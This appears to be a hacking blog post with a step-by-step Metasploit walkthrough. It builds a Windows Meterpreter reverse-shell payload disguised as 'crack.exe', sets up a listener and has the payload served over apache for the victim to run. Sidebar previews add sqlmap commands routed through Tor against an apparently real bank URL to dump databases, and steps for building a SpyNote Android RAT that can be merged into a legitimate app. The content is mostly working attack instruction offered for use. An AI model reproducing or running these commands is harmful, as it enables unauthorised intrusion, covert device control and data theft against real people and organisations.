Skip to main content

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator

Introduction:

The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. 

This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box.

Step 1:

- Open terminal in Kali and type the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe



Step 2:

- Open terminal in Kali and type the following commands

   msfdb init
   msfconsole
   use exploit/multi/handler
   set payload windows/x64/meterpreter/reverse_tcp
   set lport 8080
   set lhost <your IP address>
   exploit


Step 3:

- Use apache2 command to start a local server so that the file could be accessed from other         system and paste the payload created into the /var/www/html folder



Step 4 :

- Access the file onto the windows system (target PC) and execute it.


Step 5:

- you will see a new meterpreter session opened in your Kali terminal. ☺


   

Reviews and Comments will be appreciated. Thanks ☺

Labels:

Comments

Post a Comment

Popular posts from this blog

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=
3 comments
Read more

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your control now. ☺ Counte
31 comments
Read more